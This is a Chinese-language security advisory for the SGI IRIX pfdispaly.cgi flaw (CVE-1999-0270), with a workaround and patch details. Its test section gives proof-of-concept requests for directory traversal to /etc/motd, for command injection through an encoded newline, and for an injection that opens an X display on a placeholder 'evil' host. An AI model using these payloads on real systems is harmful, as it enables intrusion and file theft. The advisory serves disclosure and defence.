发布日期：1998-04-07
更新日期：1998-04-07

受影响系统：

SGI IRIX pfdispaly.cgi
    - SGI IRIX 6.4
    - SGI IRIX 6.3
    - SGI IRIX 6.2

不受影响系统：

SGI IRIX pfdispaly.cgi
    - SGI IRIX 6.5

描述：

---

BUGTRAQ  ID: 64
CVE(CAN) ID: CVE-1999-0270

The IRIS Performer API Search Tool是一个基于Web的搜索工具，用于搜索手册页、文档、示例代码等。 安装完成后可以通过链接 http://localhost/performer 访问到，软件中包含了一个pfdispaly.cgi的脚本。

pfdispaly.cgi脚本实现上存在输入验证漏洞，远程攻击者可能利用此漏洞遍历主机目录或以Web进程的权限执行任意命令。

脚本对用户输入未进行充分过滤，远程攻击者可以在输入中插入“../”字串遍历主机目录访问任意有权限读取的文件。SGI曾经发布了一个补丁来修补此漏洞，但对脚本中存在的相似漏洞没有修补完全，远程攻击甚至可以利用此脚本执行任意命令。

<*来源：J.A. Gutierrez （spd@GTC1.CPS.UNIZAR.ES）
  
  链接：http://xforce.iss.net/static/1434.php
        ftp://patches.sgi.com/support/free/security/advisories/19980401-01-P3018
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

J.A. Gutierrez （spd@GTC1.CPS.UNIZAR.ES）提供了如下测试方法：

lynx -source 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd '

在打了patch  3018

还是可以进行如下攻击：

$lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

或

http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 改变文件访问权限，只有管理员能够执行：

1) 成为root用户

% /bin/su -
Password:
#

2) 改变文件的执行权限，保证只有管理员可以执行

# /bin/chmod 500 /var/www/cgi-bin/pfdispaly.cgi

厂商补丁：

SGI
---
SGI已经为此发布了一个安全公告（19980401-01-P3018）以及相应补丁:
19980401-01-P3018：Performer API Search Tool 2.2 pfdispaly.cgi Vulnerability
链接：ftp://patches.sgi.com/support/free/security/advisories/19980401-01-P3018

补丁下载：

ftp://sgigate.sgi.com

补丁情况：

Filename:                 README.patch.3018
Algorithm #1 (sum -r):    37955 11 README.patch.3018
Algorithm #2 (sum):       15455 11 README.patch.3018
MD5 checksum:             1169EB51D75E0794C64C2C1FD6211B69

Filename:                 patchSG0003018
Algorithm #1 (sum -r):    01679 2 patchSG0003018
Algorithm #2 (sum):       12876 2 patchSG0003018
MD5 checksum:             BD16A53A0AE693D6E9E276EE066BDBC8

Filename:                 patchSG0003018.idb
Algorithm #1 (sum -r):    01339 2 patchSG0003018.idb
Algorithm #2 (sum):       251 2 patchSG0003018.idb
MD5 checksum:             1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename:                 patchSG0003018.performer_tools_man
Algorithm #1 (sum -r):    10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum):       3144 8 patchSG0003018.performer_tools_man
MD5 checksum:             B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename:                 patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r):    48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum):       28176 18 patchSG0003018.performer_tools_sw
MD5 checksum:             DF4E8ED8326A6A0B39F7B4D67E5FD71F

浏览次数：19876
严重程度：0（网友投票）